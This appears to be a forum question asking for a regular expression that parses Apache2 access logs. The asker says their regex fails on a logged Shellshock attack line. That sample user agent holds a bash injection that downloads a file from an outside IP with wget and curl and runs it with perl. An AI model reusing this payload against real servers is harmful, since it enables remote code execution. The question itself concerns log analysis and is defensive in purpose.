I want to parse Apache2 log files and found an otherwise good regexp here to do so, using the regexp below:
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/
The problem is this regexp predates shellshock hack bots, and the string returns no match against a user agent string like sent below:
Bad example bash attack:
199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""
Here is a regular log line:
157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
Can someone provide an updated regexp that handles hacked user agent string, or suggest an alternative two step php - regexp to be more hack proof? I can see the specific problem relates to handling \" and it appears the last regep can be replaced with "(.*)"$ but I'd like an expert opinion ... Thanks.